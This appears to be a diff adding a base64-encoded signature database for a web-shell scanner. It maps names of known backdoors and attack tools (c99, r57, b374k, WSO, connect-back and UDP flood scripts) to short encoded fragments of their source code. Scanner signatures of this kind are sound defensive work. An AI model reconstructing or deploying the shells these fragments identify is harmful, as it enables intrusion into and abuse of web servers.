+VFVWNllrOUtVakJDVnpKbmRqaHRia3g1Ymtod0szQm5VV05LYzAiO3M6MjQ6InNlcnZlcl9jb25m +aWdbMV1bMF1bcGhwXSI7czo2NDoiWVdsc09qd3ZabTl1ZEQ0OEwyUnBkajQ4TDNSa1BnMEtDUWtK +UEhSa0lIZHBaSFJvUFNJeE9DVWlQanhtYjI1MCI7czoyMToicGhwX21haWxlclswXVsxXVtwaHBd +IjtzOjY0OiJKNUlIUnl4ckRodTV0aklHdG9hU0JpNGJxdmRDREVrZUc2cDNVZ1orRzdyV2tnZEds +dUlHNW80YnF2YmlCcjRiIjtzOjI2OiJzaGVsbF91cGxvYWRlclsxMV1bMF1bcGhwXSI7czo2NDoi +YlhCc1pYUmxJR0ZtZEdWeU9pQjdKR1Y0WldOZmRHbHRaWDBnYzJWamIyNWtjMXh1SWpzTkNnMEtm +UTBLRFFwbCI7czoyMToidWRwZmxvb2RlclswXVswXVtwaHBdIjtzOjY0OiIxSzBScU9FTTNialZH +TkZaYVZqVlpWR3hoY21wRGVXeGFSVGRsY2pFelJIUktabEV4Y21sVlVuSmtiV1JZZUdwIjtzOjIw +OiJlZ3lzcGlkZXJbMF1bMF1bcGhwXSI7czo2NDoiV1VpT3cwS0NRa0pmUTBLQ1FrSmFXWW9JV2x6 +WDJGeWNtRjVLQ1JwYm1SbGVGc2thMjVoYldWZEtTa2dldzBLQyI7czoyMjoiNjI5Nzg4dHJ5YWdb +MF1bMF1bcGhwXSI7czo2NDoiQWRBRDkvMVVBUUFBakFFQUFKZ0JwQUZjQVhnQTZBRU1BVGdCeUFH +TUFjZ0JJQUdvQS9mODdBQ0FBV1FCTEFGYyI7czoxNjoiZWZzbzJbMV1bMF1bYXNwXSI7czo2NDoi +bFBWd2lkR1Y0ZEZ3aUlHNWhiV1U5WENKaFkzUmhjbU5pZFdabVgzQmhkR2hjSWlCMllXeDFaVDFj +SW5sNFgyRiI7czoxNToiYzk5WzIxXVswXVtwaHBdIjtzOjY0OiJnSUNBZ0lDQWdJQ0FnSUNJZ0lD +QWdJQ0FnSUNBZ0lDQWdabUYwWVd3b1hDSlZibUZpYkdVZ2RHOGdZMmhoYm1kIjtzOjIwOiJwaGFu +dGFzbWFbMF1bMF1bcGhwXSI7czo2NDoiblp1TkdaaGVHVlpXVkIwTlcxV1RUQm9ZV3hOYmpGd1Ft +YzJReTlPU0ZKV1lqWXhaRkZJTkhsUlRuQnNTRm8wZCI7czoxNzoiYjM3NGtbMTJdWzBdW3BocF0i +O3M6NjQ6IlNJcE93MEtEUW9nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdVM1J5WldGdFEyOXVibVZqZEc5 +eUlHOTFkSEIxZEVOdmIiO3M6MjE6ImpzcHJldmVyc2VbMF1bMF1banNwXSI7czo2NDoiZlFwbGJI +TmxhV1lnS0Nna2JXOWtaU0FtSURCNE5qQXdNQ2tnUFQwOUlEQjROakF3TUNrZ2V5UjBJRDBnSW1J +aSI7czoxNToiYzk5WzE5XVswXVtwaHBdIjtzOjY0OiJaWFpoYkNnaWFXWW9hWE56WlhRb1hDUmZV +a1ZSVlVWVFZGc25ZMmduWFNrZ0ppWWdLRzFrTlNoY0pGOVNSVkZWIjtzOjE0OiJjbWRbMF1bMF1b +cGhwXSI7czo2NDoiK0NqeGljajRLUEdsdWNIVjBJSFI1Y0dVOVZFVllWQ0J1WVcxbFBTSXRZMjFr +SWlCemFYcGxQVFkwSUhaaGJIViI7czoxNDoiY21kWzNdWzBdW3BocF0iO3M6NjQ6ImdJQ0FnSUds +bUlDaDFibXhwYm1zb0pHWnBiR1VwS1hzTkNpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdhV1ki +O3M6MjU6InBocGZpbGVtYW5hZ2VyWzFdWzJdW3BocF0iO3M6NjQ6InBhMkV1ZDNKcGRHVWdJa052 +Ym5OMElHRmtVMkYyWlVOeVpXRjBaVTkyWlhKWGNtbDBaU0E5SURJaUlDWWdkbUoiO3M6MTU6ImFq +YW5bMF1bMF1bYXNwXSI7czo2NDoiSUM0aUlFZENJanNnZlEwS0lDQWdJR1ZzYzJWcFppQW9JQ1J6 +YVhwbElENDlJREV3TkRnMU56WWdLU0I3SUNSeiI7czoxOToiaXBheXM3NzdbMV1bMF1bcGhwXSI7 +czo2NDoieGlZWEl0WkdGeWEzTm9ZV1J2ZHkxamIyeHZjam9nYzJsc2RtVnlPd29nSUNBZ0lDQWdJ +Q0FnSUNCelkzSnZiRyI7czoxOToic2FmZW1vZGVbMV1bMF1bcGhwXSI7czo2NDoiSUNNZ0lDQWdJ +eU1OQ2k4cUlDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZyI7 +czoxNToicjU3WzIwXVswXVtwaHBdIjtzOjY0OiJVMjEzVnpSS2JGTkZUMGxrWWpoR2EwbFRLMU14 +VFZWMVUxZHRjVGx4VkdvMk1VSnNPSFJUWkZrd01XNHpZM3A2IjtzOjI1OiJzaGVsbF91cGxvYWRl +clsxXVswXVtwaHBdIjtzOjY0OiJ5YzlQaWNtSXpFd05UYzdKaU14TURnMk95WWpNVEEzT1RzbUl6 +RXdOelk3SmlNeE1EY3lPeVlqTVRBNU1Ec21JIjtzOjE1OiJyNTdbMTddWzBdW3BocF0iO3M6NjQ6 +Im9nSUNBZ2ZRMEtJQ0FnZlEwS0lDQjlEUW9nSUNSb1pXRmtXeVJyWFNBOUlDSThZajRpTGlSb1pX +RmtXeVJyWFMiO3M6MTQ6ImM5OVs5XVswXVtwaHBdIjtzOjY0OiJTSXBPeUJsZUdsME95QjlDZ292 +TDAxaGFHdGxiV1VnUld0c1pXNTBhWE5wYm1VZ1dXRnJZV3hoYmlZak16QTFPIjtzOjE4OiJtYWhr +ZW1lWzBdWzBdW3BocF0iO3M6NjQ6InZibWMrQ2p4aVBqeDFQanhqWlc1MFpYSStQRDl3YUhBZ1pX +Tm9ieUFpVkdocGN5QnpaWEoyWlhJZ2FHRnpJR0oiO3M6MjA6InJvb3RzaGVsbFszXVswXVtwaHBd +IjtzOjY0OiJGaVl6VTFZamdpT3lBamNtOXZkQTBLSkdOdmJHOXlJRDBnSWlOa1pqVWlPdzBLSkdS +bFptRjFiSFJmWVdOMGFXIjtzOjIwOiJmaWxlc21hblsxMF1bMF1bcGhwXSI7czo2NDoiaGJEMGta +R2x5WDJGMGRXRnNKeXRoY21jckp5OG5PdzBLZlEwS1puVnVZM1JwYjI0Z2MyaHZkMTl1WVcxbGN5 +ZyI7czoyNToicGhwZmlsZW1hbmFnZXJbMF1bMl1bcGhwXSI7czo2NDoiV0V4RGFGVlhaak5KVGpS +UmMxRlRSVkk0YkN0MVdVZFFabkZxUTJkNVZqRldNRlIwWTFwUWRESlZNbmRHYVVsaiI7czoyMToi +Y2xlYXJzaGVsbFswXVswXVtwaHBdIjtzOjY0OiJ3WVhOemQyUThMMjl3ZEdsdmJqNE5Danh2Y0hS +cGIyNGdkbUZzZFdVOUltNWxkSE4wWVhRZ0xXRnVJSHdnWjNKIjtzOjE4OiJsaXpvemltWzFdWzBd +W3BocF0iO3M6NjQ6InBPdzBLSUgwTkNpQnBaaWdrWDFCUFUxUmJKM0JoYzNNblhTQTlQU0FrY0dG +emMzZHZjbVFwRFFvZ2V3MEtJQ0EiO3M6MjA6Imlyb25zaGVsbFsyXVswXVtwaHBdIjtzOjY0OiJZ +eloxa3JWblJSUTJGSlJWQmhjbHBsZGpkSk9USldRVE5uUzFaMlpWRXdOamhyTTI1Q2RtTm5TREF5 +VEc5SlptIjtzOjIwOiJhbC1tYXJodW1bMF1bMF1bcGhwXSI7czo2NDoiSmtaWEk5TVQ0S0NqeDBj +aUJpWjJOdmJHOXlQV2R5WldWdVBqeDBaRDVrTUcxaGFXNXpQQzkwWkQ0OGRHUStkWCI7czoyMDoi +Y29uZmlnc3B5WzNdWzBdW3BocF0iO3M6NjQ6IkJvY0dKaUoxMHBLU0FLZXlBS1pXTm9ieUFpUEdO +bGJuUmxjajQ4ZEdGaWJHVWdZbTl5WkdWeVBUQWdkMmxrZEciO3M6MTg6ImxvbGlwb3BbMF1bMF1b +cGhwXSI7czo2NDoiVlVWVFZGc25aR2x5SjEwN0Nna0pKR1p1WVcxbFBTUklWRlJRWDFCUFUxUmZS +a2xNUlZOYkoyWnBiR1ZmYm1GdCI7czoyMjoicGhwYmFja2Rvb3JbMF1bMF1bcGhwXSI7czo2NDoi +SnlPREY0VXk5eFNFUmxlbk5KTDI0d09TOVFjRFpsWlZnNFdpOUxkbFE1U2lzdlpWcHlLMGQxWVRo +d2RrZHRaViI7czoyMjoiZGV2aWx6c2hlbGxbMF1bMF1bcGhwXSI7czo2NDoiYldWdWRDNWpjbVZo +ZEdWRmJHVnRaVzUwS0NKd2NtVWlLVHNOQ2w5aExuTjBlV3hsTG1ScGMzQnNZWGs5SW1sdSI7czoy +OToiYWpheF9jb21tYW5kX3NoZWxsWzFdWzBdW3BocF0iO3M6NjQ6ImNHVTlkR1Y0ZENJdVFDUmZV +RTlUVkZzblptbHNaU2RkTGlJK1BHSnlQaUk3Q21WamFHOGdJanhwYm5CMWRDQjAiO3M6MTc6Im5z +aGVsbFswXVswXVtwaHBdIjtzOjY0OiJHVmhaR1Z5SUM0OUlDSWtiV1Z6YzJGblpWeHlYRzRpT3cw +S0lDQWdJQ0FnU1dZZ0tDUm1hV3hsWDI1aGJXVXBJIjtzOjE1OiJzcGFtWzJdWzBdW3BocF0iO3M6 +NjQ6Ik1qRWdYRzRpT3lBS2ZTQUtkWE5sSUZOdlkydGxkRHNnQ25WelpTQkdhV3hsU0dGdVpHeGxP +eUFLYzI5amEyVjAiO3M6MjI6ImNvbm5lY3RiYWNrMlswXVswXVtwbF0iO3M6NjQ6InBPbmc2TDJj +cGV3b21iR2xzS0NReEtUc0tjSEpwYm5RZ1RWbEdTVXhGSUNReExpSXVkSGgwSUNJN0NtWnZjaWci +O3M6MTc6Imtpbmc1MTFbMF1bMF1bcGxdIjtzOjY0OiJDZ2tKSUdsbUlDaHpkSEl1YVc1a1pYaFBa +aWhrYjNRc0tHeGhkQ3N5S1NrOVBTMHhLWHNLQ2drSklDQWdJR0ZzIjtzOjM2OiJjcmlzdGVyY29y +cF9pbmZvY29sbGVjdG9yWzFdWzBdW3BocF0iO3M6NjQ6IlhoMFBTSWpOMkUzWXpka0lqNE5DaUFn +SUNBZ0lDQThaR2wySUdGc2FXZHVQU0pqWlc1MFpYSWlQZzBLSUNBZ0kiO3M6MTg6InRlYW1zcWxb +MV1bMF1bcGhwXSI7czo2NDoiQ0FnSUNBZ0lDQmpiMjUwWVdsdWFXNW5JR0VnWUM0bklHWnZiR3h2 +ZDJWa0lHSjVJRzkwYUdWeUlIUmxlSFFnYSI7czoxNToic210cGRbMF1bMV1bcHldIjtzOjY0OiJN +R1I2WVU4MWRFaGpNbXAxWWxJelRtODNiVEJrZW1FS1R6VjBTR015YW5WaVVqTk9iemR0TUdSNllV +ODFkRWhqIjtzOjE5OiJkYzNzaGVsbFswXVswXVtwaHBdIjtzOjY0OiJna1gxQlBVMVJiSjJOdmJX +MWhibVFuWFNrN0RRcGxZMmh2SUNJOEwzUmxlSFJoY21WaFBpSTdEUXBsZUdsME93IjtzOjE5OiJk +YzNzaGVsbFsxXVswXVtwaHBdIjtzOjY0OiIyVXVZMjl0Q2dvZ0lFTnZjSGx5YVdkb2RDQW9ZeWtn +TWpBd015QnZjME52YlcxbGNtTmxDZ29nSUZKbGJHVmhjIjtzOjE1OiJjbWRbMzRdWzBdW3BocF0i +O3M6MTM4OiJrMXBlR3d5UVVwaVRXUmxVMDVMZGt3MVFXOWhiemczVDNwemVuVXhkRFkwV2xSR09X +VktkVFJKTlZWQ04wbHBNRzlwSzBFME1VMVBUMEZKTjNreFRWWlZRbFkzV0dkSVRrWjNkVGRwYnpr +NGNXZElNME5CTm5SbGMxSTJUWFZKU0hJMGNTOVNNVkUiO3M6MTY6InB6YWR2WzBdWzFdW3BocF0i +O3M6NjQ6IkY0TkUxcVJrOVlTR2Q2V1ZaNE5FMUhVbU5sUkVVeFdFaG5kMWxzZURSTlYxWmpaVVJC +TWs1RVdtTmxSRWwzV0UiO3M6MjI6Impvb21sYV9zcGFtWzJdWzFdW3BocF0iO3M6NjQ6ImFXNGdZ +Mjl1Wm1sbkxpb2dabWxzWlhNdUxpNWNibHh1SWpzZ0RRcG1iM0psWVdOb0lDZ2tkWE5sY25NZ1lY +TWciO3M6MTQ6Ik8wT1swXVswXVtwaHBdIjtzOjY0OiJtVjNJRk5vWld4c0lFSjVJQzR2VFVONVlt +VnlUR2x1YTE5UWIzSjBNaklwSUNvdklBMEtKR0YxZEdoZmNHRnpjIjtzOjIwOiJwaHBzaGVsbFsz +NV1bMF1bcGhwXSI7czo2NDoiQ2drWkdseUxpSXZJaTRrWkdsemJXa3lMQ1JtYVd4bGNHVnliU2tn +UHlBaVBHWnZiblFnWTI5c2IzSTlKeU13TSI7czoxNzoiYVpSYWlMWzBdWzBdW3BocF0iO3M6NjQ6 +IldDMXZJRFl0YnlCWUxXOGdUeTF2SUV3dGJ5QmxMVzhnZUMxdklGSXRieUEwTFc4Z0t5MXZJRFl0 +YnlCVUxXOGciO3M6MTU6ImM5OVsxNl1bMF1bcGhwXSI7czo2NDoiM1IzWnphbWhXYjBOWGRWVXph +bU5tTlhoSVNXVldSMlpoTkRsYVZURlVVbFJOTXpWdVZXeEVhV1oxZUVaalNqUiI7czoyMDoic3R1 +bnNoZWxsWzJdWzBdW3BocF0iO3M6NjQ6IktJQ0FrUkVORGV5UmtZMk56YjJOcmZYdGllWFJsYzMw +Z1BTQWtZbmwwWlhNN0NpQWdKRVJEUTNza1pHTmpjMjkiO3M6MTc6InBlcmxib3RbMF1bMV1bcGxd +IjtzOjY0OiJ6SWl3aVFXeGhkbWtpTENKQmJHTnZjbTRpTENKQmJHUmhJaXdOQ2lKQmJHVnJjeUlz +SWtGc2JHbHpiMjRpTENKIjtzOjE4OiJoYXJhdWt1WzBdWzBdW3BocF0iO3M6NjQ6IkV0YWJERkti +R2NOQ2pWR00xVkRhbXhQWlVkb1dIcGtkMWxUVFRsdVVIcG5abHBqUkVwVlkyWlFXR2sxWWtGTU0i +O3M6MTc6ImIzNzRrWzExXVswXVtwaHBdIjtzOjY0OiJkSFJaVW1GQ1YybE1URlZ5U0hseFpITjVN +R0U1VUhSbkwyWXdUSEp4Tm5ad1VXWTBPR3czT0RJM1lYTlFlVmRTIjtzOjE0OiJjOTlbMV1bMF1b +cGhwXSI7czo2NDoiRXRhU0IxTFdrZ2VDMXBJRkF0YVNBMExXa2dNaTFwSUZRdGFTQktMV2tnVGkx +cElHUXRhU0IzTFdrZ01TMXBJSCI7czoxOToicGhwc2hlbGxbMV1bMF1bcGhwXSI7czo2NDoiSUdK +eVpXRnJPd3A5Q21sbUlDZ2hKR3hsYmlrZ2V3b0pJeUJYWlNCbVlXbHNaV1FnYjI0Z2RHaGxJRzFo +YVc0ZyI7czoyMToibWV0YXNwbG9pdFswXVswXVtwaHBdIjtzOjY0OiJEMGdiWGx6Y1d4ZmJHbHpk +RjlrWW5Nb0pITnhiRjl6YjJOcktUc05DaUFnSUdsbUlDZ2hKSEpsYzNWc2RDa2dlIjtzOjE1OiJj +MTAwWzBdWzBdW3BocF0iO3M6NjQ6Ik5vYnlBaVJtRnBiQ0k3Q2drSkNYSmxkSFZ5YmpzS0NRbDlD +Z2tKSkdOdmJDQTlJRzE1YzNGc1gyNTFiVjltYVciO3M6MTk6IndlYm15c3FsWzBdWzBdW3BocF0i +O3M6NjQ6IlpHVnpJSFpsYm1GdWRDQmtaU0JRU0ZBaU93cDlDZ3BwWmlna2IzQjBhVzl1SUQwOUlE +SXBld29nSUNBZ2NISnAiO3M6MTk6ImJhY2tkb29yWzJdWzBdW3BocF0iO3M6NjQ6ImJrcGlaRGty +TkhGelZqWmFXa1pRVjFSUllVSnNZMmsxUzJOSGFERTNXVTVRVG14Vk9DSXNJalZXUlVReldrdEUi +O3M6MTk6InBocHNoZWxsWzhdWzBdW3BocF0iO3M6NjQ6IlBEOXdhSEFOQ21sbUtDUmZVRTlUVkZz +aWNHRnpjeUpkSUQwOUlDSXlOak5qWkRkaFpUVXdOemhoT0RReFpUQXgiO3M6MTQ6ImNtZFs4XVsw +XVtwaHBdIjtzOjY0OiJSWFJ6VEd0MlkxZEdXV3R1TDFsUmIyOWFNVGRHYURCSVJHVk5XRkJqUlVK +VVdUZzNiMDgyV0dWSlNHdDFRbmxqIjtzOjE1OiJ3c29bMTldWzBdW3BocF0iO3M6NjQ6ImMzUWdQ +U0FuSWlJbk93b2dJSDBnWld4elpTQjdDaUFnSUNBa1pYTmpZWEJsWkNBOUlHRnljbUY1WDIxaGND +Z24iO3M6MTk6InNpbXNoZWxsWzBdWzBdW3BocF0iO3M6NjQ6IkdWeWJYTTlKSFI1Y0dWYk1GMDdD +aUFrY0dWeWJYTXVQU2drYlc5a1pTQW1JREF3TkRBd0tTQS9JQ0p5SWlBNkkiO3M6MTQ6Imdmc1sw +XVswXVtwaHBdIjtzOjY0OiI3Q2lBZ0lDQWdJQ0FnZlFvZ0lDQWdmUXA5Q2o4K0NqeGljajRLUEhS +bGVIUmhjbVZoSUc1aGJXVTlJbk5vWld4IjtzOjE4OiJteXNoZWxsWzBdWzBdW3BocF0iO3M6NjQ6 +IlFwR2IyeGtaWEpCZEhSeWFXSjFkR1Z6SUQwZ0lsTjVjM1JsYlN3Z1JHbHlaV04wYjNKNUlncGpZ +WE5sSURJeUkiO3M6MTg6Im50ZGFkZHlbMF1bMF1bYXNwXSI7czo2NDoiN0RRb2dJR1ZqYUc4Z0lr +WnNkWE5vWEc0aU93MEtJQ0JsWTJodklDSThkV3crWEc0aU93MEtJQ0JsWTJodklDSSI7czoxNjoi +bXlzcWxbN11bMF1bcGhwXSI7czo2NDoiMVJWTUU1RVRYcE9WRWw1V2tSYWJFOUVZek5OZWtFd1Qx +ZE9hVmt4YzJsYVdHaHNXVE5XTUZwVFNtUkpSREJuUyI7czoxODoidGRzaGVsbFsxXVswXVtwaHBd +IjtzOjY0OiJRMWd3VjFaRlZIVjZURE41VkUxNWNWRkhZVmRFU0ZOYVpVWlFPV1JHUjAwMmIzZDVN +WEpoWXpOQk0yTlNTbEZOIjtzOjE5OiJmaWxlc21hblsxXVswXVtwaHBdIjtzOjY0OiJkT1NFWlJN +RGt2V1VkQmRHSjFjWFo0ZEhwVWNYcDRPVXhKTVZrNE4wa3lVRlJ6UzI1MFVFdFZWVkZqUWxwdFNH +IjtzOjE0OiJjOTlbMl1bMF1bcGhwXSI7czo2NDoia1ZVTGoxbVoyVjBjeWdrWml3Z05EQTVOaUFw +T3dvSlptTnNiM05sS0NBa1ppQXBPd29LQ1hCeWFXNTBJQ0pjYiI7czoxODoiZHhzaGVsbFsxXVsw +XVtwaHBdIjtzOjY0OiJEcThPdHc2WERyY09vdzZVZ3c2L0RzTU91dzZqRHA4T2l3NjdEcThPOHc2 +M0Ryc09qdzY0Z1VFaFFMY09xdzY3IjtzOjE0OiJjOTlbOF1bMF1bcGhwXSI7czo2NDoiZG1Gc2RX +VTlJaTlsZEdNdmMzbHpiRzluTG1OdmJtWWlQbE41YzJ4dlp5QkJlV0Z5YkdGeWFUd3ZiM0IwYVc5 +dSI7czoxOToic3B5c2hlbGxbMV1bMF1bcGhwXSI7czo2NDoiSmNJajRpTGlSMllXeDFaUzRpTHp3 +dlFUNGdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWlMbVJoZEdVb0luSWlMRyI7czoxOToiYmFja2Rv +b3JbMV1bMF1bcGhwXSI7czo2NDoiaUJ2ZEdobGNpQm1jbVZsSUc5eUlHOXdaVzRnYzI5MWNtTmxJ +SE52Wm5SM1lYSmxJR3hwWTJWdWMyVnpMZ29nSyI7czoxNToiYzk5WzI3XVswXVtwaHBdIjtzOjY0 +OiJQRDl3YUhBTkNtVmphRzhnSWp4b016NVhiM0pyY3lFZ1ZYTmhaMlU2SUdjd01HNHVjR2h3UDJj +d01HNDlXME5OIjtzOjE1OiJjbWRbMzBdWzBdW3BocF0iO3M6NjQ6IlYwWlhJbkxBb25jbVZ6WlhR +bklEMCtJQ2RTdzZscGJtbDBhV0ZzYVhObGNpY3NDaWR5Wld4aGRHbDJaU2NnUFQiO3M6MTc6Imhh +Y2tlclswXVswXVtwaHBdIjtzOjY0OiJHVnliWE1OQ2lBZ1EyRnNiQ0J2VXk1U2RXNG9JbmRwYmk1 +amIyMGdZMjFrTG1WNFpTQXZZeUJqWVdOc2N5NWxlIjtzOjE1OiJjbWRbMTVdWzBdW2FzcF0iO3M6 +NjQ6IjJobGNpQnNaWFpsYkhNZ1BDOWthWFkrSUFvZ0lDQWdQQzltYjNKdFBpQUtJQ0FnSUR3dmRH +UStJQW9nSUR4MFoiO3M6MTY6ImMyMDA3WzBdWzBdW3BocF0iO3M6NjQ6ImQwNHlkSFpXUldoTFlt +MW9hVk5JYkZKaFYxSldZbGh3YTJKSGQzcFdSelY0V2pOYWRsUllhREpPVjNONFRtczUiO3M6MTQ6 +Indzb1s3XVswXVtwaHBdIjtzOjY0OiJSVFY2ZUhWellUTXZLM1JxTlRKYVIxWmphRzQ1VGxkcWMw +bHlUM2M1S3k5eWRXWXlSbmhyTVZsa2VtaGlOekJoIjtzOjIwOiJmaWxlc21hblsyM11bMF1bcGhw +XSI7czo2NDoiQ1l1Znk4eVMzaHJLMUpUUkdKUEt5eEtSVnN4WEZjbmNrcEFJMEFtTGl0cmQxY0pa +RzVTVTBSaVdXNVFSVVZNVyI7czoxODoiaW5kZXhlclswXVswXVthc3BdIjtzOjY0OiJ5VHpoMU1s +WTRiMmhLV1VNcllrWnhTbXRvZVZjNGJqSktTa05VWVRkSE4xb3hZbm93ZG1WTFVFNTJka0pHZFdW +IjtzOjE4OiJ3ZWJyb290WzFdWzBdW3BocF0iO3M6NjQ6Ikk4TDI5d2RHbHZiajVjY2x4dUlqc05D +aUFnSUNCOURRb2dJSDBOQ2lBZ1pXTm9ieUFpUEM5elpXeGxZM1ErWEgiO3M6MjI6IkZhVGFMaXNU +aUN6WzBdWzBdW3BocF0iO3M6NjQ6IkF2WjNKbGNDNTBlSFFuTEFvbmJHOWpZWFJsSUdOdmJtWnBa +eTV3YUhBZ1ptbHNaWE1nUGo0Z0wzUnRjQzluY20iO3M6MTU6InI1N1sxNF1bMF1bcGhwXSI7czo2 +NDoiSHBqTUdSbENnb2thbUZ0WlhNd1ltRnpkR1Z5SUQwZ0lqZFlNVGRsT1hFME9IWkVaak5sWmxv +M05rSTJZM2hpVyI7czoxNjoiYjM3NGtbNV1bMF1bcGhwXSI7czo2NDoia2IwNDRhbmRSUVdSRlZs +Y0tWbGt4Y2tWUU9WVnFkMUprV0c5MFpFUkJka0ZrUkU0MFVFbDBOME5HVUc5eFpqYyI7czoxNDoi +ZngwWzNdWzBdW3BocF0iO3M6OTU6ImJiOkpGOWZYMTlmS3lzcGV5UmZYMTlmV3lSZlgxOWZYMTA5 +WTJoeUtDZ2diM0prS0NSZlgxOWZXeVJmWDE5ZlgxMHBMVzl5WkNna1gxOWZXeVJmWDE5ZlgxMHBL +UT09IjtzOjE0OiJwYXNbMF1bMF1bcGhwXSI7czo2NDoiWFNrN0RRb2dJQ0FnSUNBZ0lHVmphRzhn +SWp3dmRHVjRkR0Z5WldFK0lqc2dJQ0FnWkdsbEtDazdEUW9nSUNBZyI7czoxOToiZ3Njc2hlbGxb +MF1bMF1bcGhwXSI7czo2NDoic0lDUjFjR3h2WVdSbWFXeGxLU2tnZXdvZ0lDQWdaV05vYnlBaTFP +RHA2KzRnOC9IdjVmanQ3aURuNE9QdzgrYiI7czoyMToia2Fkb3RzaGVsbFswXVswXVtwaHBdIjtz +OjY0OiJnSUNBZ1BIUmtJSGRwWkhSb1BTSXlNVGtpUGcwS0lDQWdJQ0FnSUNBOFptOXVkQ0J6YVhw +bFBTSXRNeUlnWm1GIjtzOjE1OiJzcGFtWzNdWzBdW3BocF0iO3M6NjQ6Ikl3VFdwcWNUQlRkSEps +Y0daUVdVb3pjVzkwZG5remEzUkxhMDgzTjJoV09YZzJUQzgxVW5VMWEwbFZSV0oyT0QiO3M6MTU6 +ImM5OVsxM11bMF1bcGhwXSI7czo2NDoiZUZNNUszaDFkREl3VWtWRVlXWnJRbUZOYVVSMFNVTkVk +RTFEUkhSNVMxQkpkbXcxUlRaUGVWZFlNMFJHWm5aSyI7czoxNToiYzk5WzE3XVswXVtwaHBdIjtz +OjY0OiJHRnNiRzkzTEdSbGJua0tJQ0FnSUVGc2JHOTNJR1p5YjIwZ1lXeHNDand2Um1sc1pYTStD +Z29qSUUxaGEyVWdMIjtzOjMwOiJodGFjY2Vzc19zaGVsbFswXVswXVtodGFjY2Vzc10iO3M6NjQ6 +ImdQejgvUHo4L1B6OC9QeUJ6YUdWc2JDMC9QejgvUHo4Z0tEOC9QejgvSUQ4L1B6OC9QejhzSUQ4 +L1B6OC9JRDgiO3M6MTU6ImM5OVsyNV1bMF1bcGhwXSI7czo2NDoiSUhaaGJIVmxQU0pGYm5SbGNp +SStDand2ZEdRK1BDOTBjajRLSkhSbGJtUUtTRlJOVERzS0NtbG1JQ2hwYzNObCI7czoxOToia2F1 +c2hlbGxbMF1bMF1bcGhwXSI7czo2NDoiRzlFTURCT1RuSldUMlpPZEZrcmVIRjVOMDR6UVdkbVNW +ZGlhMHMyZWtrdlkxbFFaM0oxVm5wWGVrc3hORkpvTyI7czoyMDoiZGFya3NoZWxsWzFdWzBdW3Bo +cF0iO3M6NjQ6ImdQSFJrSUhkcFpIUm9QU0kxTUNVaUlHaGxhV2RvZEQwaU1TSWdkbUZzYVdkdVBT +SjBiM0FpSUdKblkyOXNiM0kiO3M6MjM6InN0cmVzc2J5cGFzc1sxXVswXVtwaHBdIjtzOjY0OiJ5 +SUZObGNuWmxjaUJwYm5SeWRYTnBiMjQ4TDI5d2RHbHZiajROQ2p4dmNIUnBiMjRnZG1Gc2RXVTlJ +akUxSWlBIjtzOjE4OiJtYWRzcG90WzBdWzBdW3BocF0iO3M6NjQ6IlRUWnBVa2d6VlVWUWREWnpa +QzlaY1dGWVlqaHZiVEF6ZUdKMWNVWk5hVzlRWTNsVmRrdFFOblpUVW5wamNXMXAiO3M6MTk6ImZp +bGVzbWFuWzBdWzBdW3BocF0iO3M6NjQ6Ik5sSUdZdVlYUjBjbWxpZFhSbGN3MEtZMkZ6WlNBd0RR +cEdiMnhrWlhKQmRIUnlhV0oxZEdWeklEMGdJazV2Y20iO3M6MjI6ImVsbWFsaXNla2VyWzBdWzBd +W3Zic10iO3M6NjQ6ImhaRGQ0Y1M4ME55dGlaMGx4VDFNeGRtWnBjV2Q0YW10ek1FRkVOa2xJWTJo +a00zcFZXRGM1ZG5Gd1ZGZGxVeloiO3M6MTU6ImM5OVsyMF1bMF1bcGhwXSI7czo2NDoiU2lzNGEy +MTZZa3hsYm1aQmVuQkhjVFpsVml0cWRrZHFkazg0VDBKTlVubGFVVE55YzNCdGRDczFUeTlaYXpC +YSI7czoxNToicjU3WzE4XVswXVtwaHBdIjtzOjY0OiJZV1FnWkdGMFlRb0phV1lvSkVWT1Zuc25R +MDlPVkVWT1ZGOVVXVkJGSjMwZ1BYNGdMMjExYkhScGNHRnlkRnd2IjtzOjE2OiJ0ZWxuZXRbMV1b +MF1bcGxdIjtzOjY0OiJQU2N3TkNjN0lHSnlaV0ZyT3cwS0NRa0pDV05oYzJVZ0p6VW5PaUFnSkdS +aGRHVTlKekExSnpzZ1luSmxZV3M3IjtzOjIwOiJmb3JldmVycHBbMF1bMV1bcGhwXSI7czo2NDoi +YVhwbElsMDhKRjlRVDFOVVd5Sk5RVmhmUmtsTVJWOVRTVnBGSWwwcENpQWdJQ0I3Q2lBZ0lDQWdJ +R2xtS0cxdiI7czoyMjoicGhwYmFja2Rvb3JbMV1bMF1bcGhwXSI7czo2NDoiWld4c1BDOTBhWFJz +WlQ0OGJXVjBZU0JvZEhSd0xXVnhkV2wyUFNKRGIyNTBaVzUwTFZSNWNHVWlJR052Ym5SbCI7czoy +NToiYW50aWNoYXRfc2hlbGxbMV1bMF1bcGhwXSI7czo2NDoiWlEwS0NRa0pDVkpsYzNCdmJuTmxM +bGR5YVhSbElDSThabTl1ZENCbVlXTmxQU0lpWVhKcFlXd2lJaUJ6YVhwbCI7czoyMToic21hcnRz +aGVsbFswXVswXVthc3BdIjtzOjY0OiJWa0p5QTlQaUFpUkdsemMyVWdabWxzWlhJZ1pYSWdhMjl3 +YVdWeVpYUWdkR2xzSUZ3aVd5VXlYVndpT2x4dVd5IjtzOjE5OiJ3ZWJhZG1pblsyXVsyXVtwaHBd +IjtzOjY0OiJNR2MxY2l0cVVXUjZWR3hyTW5kWWFWY3dkMGgxYUZCTmVUSkJSME5wVFdzdmVrNUNU +RFpyTlhGV1Mwc3dTbTVVIjtzOjE3OiJiMzc0a1sxN11bMF1bcGhwXSI7czo2NDoiUEQ5d2FIQUtM +eXBqT0RZME9XRTVZVEUyTlRObU9EVXlPRFF6WmpRMFpqa3hObUpqWWpRMFpDb3ZhV1lvYVhOeiI7 +czoxNToiY21kWzE0XVswXVtwaHBdIjtzOjY0OiJGVTNOVlEzUWpKeVJUSTJPVWQ0Y0hCRmRqWjNS +Rzk1WVNzeGRFNUNkVlZXVURSSFYwRlZMM1p2ZVUxNE1WZ3hXIjtzOjIwOiJwaHBzaGVsbFsyNl1b +MF1bcGhwXSI7czo2NDoicElIc05DaUFnSUNBZ0lDQWdjSEpwYm5RZ0lrWnBiR1U2SWk0Z0lHSmhj 